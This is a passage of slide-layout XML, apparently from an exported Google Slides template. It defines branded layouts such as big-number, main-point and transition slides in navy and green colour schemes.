                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="199" name="Google Shape;199;p32"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00" name="Google Shape;200;p3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201" name="Google Shape;201;p32"/>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Z2 - DO NOT USE - for template">
  <p:cSld name="CAPTION_ONLY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290500" y="9631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pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Google Shape;204;p33"/>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205" name="Google Shape;205;p3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206" name="Google Shape;206;p33"/>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E1 - Numbers (1 large)">
  <p:cSld name="BIG_NUMBER_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 207"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="208" name="Google Shape;208;p34"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09" name="Google Shape;209;p34"/>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0" name="Google Shape;210;p34"/>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1" name="Google Shape;211;p3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12" name="Google Shape;212;p34"/>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E2 - Numbers (1 large, pattern)">
  <p:cSld name="BIG_NUMBER_1_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 213"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p35"/>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5" name="Google Shape;215;p35"/>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216" name="Google Shape;216;p35"/>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217" name="Google Shape;217;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-194725" y="835700"/>
            <a:ext cx="2036400" cy="20364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738325" y="1111550"/>
            <a:ext cx="722100" cy="72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35"/>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220" name="Google Shape;220;p35"/>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221" name="Google Shape;221;p35"/>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E3 - Numbers (1 large, title)">
  <p:cSld name="BIG_NUMBER_1_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p36"/>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4" name="Google Shape;224;p36"/>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25" name="Google Shape;225;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216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26" name="Google Shape;226;p3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27" name="Google Shape;227;p3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28" name="Google Shape;228;p36"/>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4 - Numbers (2 large)">
  <p:cSld name="BIG_NUMBER_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 229"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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1" name="Google Shape;231;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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232" name="Google Shape;232;p37"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33" name="Google Shape;233;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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4" name="Google Shape;234;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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235" name="Google Shape;235;p3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36" name="Google Shape;236;p37"/>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E5 - Numbers (2 large, title)">
  <p:cSld name="BIG_NUMBER_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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39" name="Google Shape;239;p38"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40" name="Google Shape;240;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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1" name="Google Shape;241;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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242" name="Google Shape;242;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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3" name="Google Shape;243;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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244" name="Google Shape;244;p3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45" name="Google Shape;245;p38"/>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6 - Numbers (3 large)">
  <p:cSld name="BIG_NUMBER_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 246"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="247" name="Google Shape;247;p39"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48" name="Google Shape;248;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59250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9" name="Google Shape;249;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58575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0" name="Google Shape;250;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309075"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1" name="Google Shape;251;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302325"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2" name="Google Shape;252;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602565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3" name="Google Shape;253;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601890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4" name="Google Shape;254;p3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55" name="Google Shape;255;p39"/>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E7 - Numbers (3 large, title)">
  <p:cSld name="BIG_NUMBER_1_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 256"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59250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8" name="Google Shape;258;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58575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9" name="Google Shape;259;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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0" name="Google Shape;260;p4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61" name="Google Shape;261;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309075"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2" name="Google Shape;262;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302325"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3" name="Google Shape;263;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602565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4" name="Google Shape;264;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601890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65" name="Google Shape;265;p4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66" name="Google Shape;266;p40"/>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X1 - Title (DLT)">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Google Shape;29;p5" descr="DLT_lockup_gr-02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085175" y="1877525"/>
            <a:ext cx="6973653" cy="1388450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;30;p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E8 - Numbers (3 large, pattern">
  <p:cSld name="CUSTOM_11">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 267"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261325"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269" name="Google Shape;269;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446413"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270" name="Google Shape;270;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631525"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271" name="Google Shape;271;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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 name="Google Shape;272;p41"/>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273" name="Google Shape;273;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634900"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4" name="Google Shape;274;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628150"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75" name="Google Shape;275;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3451488"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6" name="Google Shape;276;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444737"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77" name="Google Shape;277;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268088"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8" name="Google Shape;278;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261337"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79" name="Google Shape;279;p4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280" name="Google Shape;280;p41"/>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 - Main Point (green)" type="blank">
  <p:cSld name="BLANK">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 281"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271025"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 name="Google Shape;283;p42"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84" name="Google Shape;284;p4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285" name="Google Shape;285;p42"/>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6 - Subtitle (no details, navy)">
  <p:cSld name="CUSTOM_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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311700" y="445025"/>
            <a:ext cx="8520600" cy="3937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pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p43"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89" name="Google Shape;289;p4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290" name="Google Shape;290;p43"/>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3 - Main point (navy)">
  <p:cSld name="BLANK_4">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solid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a:off x="242450"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3" name="Google Shape;293;p44"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94" name="Google Shape;294;p4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95" name="Google Shape;295;p44"/>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4 - Main Point (green, details)">
  <p:cSld name="BLANK_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 296"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="Google Shape;297;p4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98" name="Google Shape;298;p45"/>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 name="Google Shape;299;p45"/>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363F44"/>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00" name="Google Shape;300;p4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301" name="Google Shape;301;p45"/>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5 - Main Point (navy, details)">
  <p:cSld name="BLANK_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 302"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Google Shape;303;p4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04" name="Google Shape;304;p46"/>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46"/>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06" name="Google Shape;306;p4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307" name="Google Shape;307;p46"/>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6 - Main Point (navy and green, details)">
  <p:cSld name="BLANK_2_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 308"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Google Shape;309;p47"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10" name="Google Shape;310;p47"/>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6BBF4E"/>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47"/>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12" name="Google Shape;312;p4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313" name="Google Shape;313;p47"/>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7 - Main Point (green and navy, details)">
  <p:cSld name="BLANK_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 314"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p48"/>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363F44"/>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48"/>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17" name="Google Shape;317;p48"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18" name="Google Shape;318;p4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319" name="Google Shape;319;p48"/>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8 - Main Point (large text green)">
  <p:cSld name="BLANK_5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 320"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271025"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 name="Google Shape;322;p4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9 - Main Point (large text navy)">
  <p:cSld name="BLANK_4_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 323"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450"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5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X2 - Body (DLT)">
  <p:cSld name="CUSTOM_3">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3" name="Google Shape;33;p6" descr="DLT_lockup.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4551503"/>
            <a:ext cx="1747975" cy="300200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;34;p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35" name="Google Shape;35;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225400" y="4612713"/>
            <a:ext cx="984229" cy="1777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Y2 - Transition image (mission control)">
  <p:cSld name="CUSTOM_5">
    <p:spTree>
      <p:nvGrpSpPr>
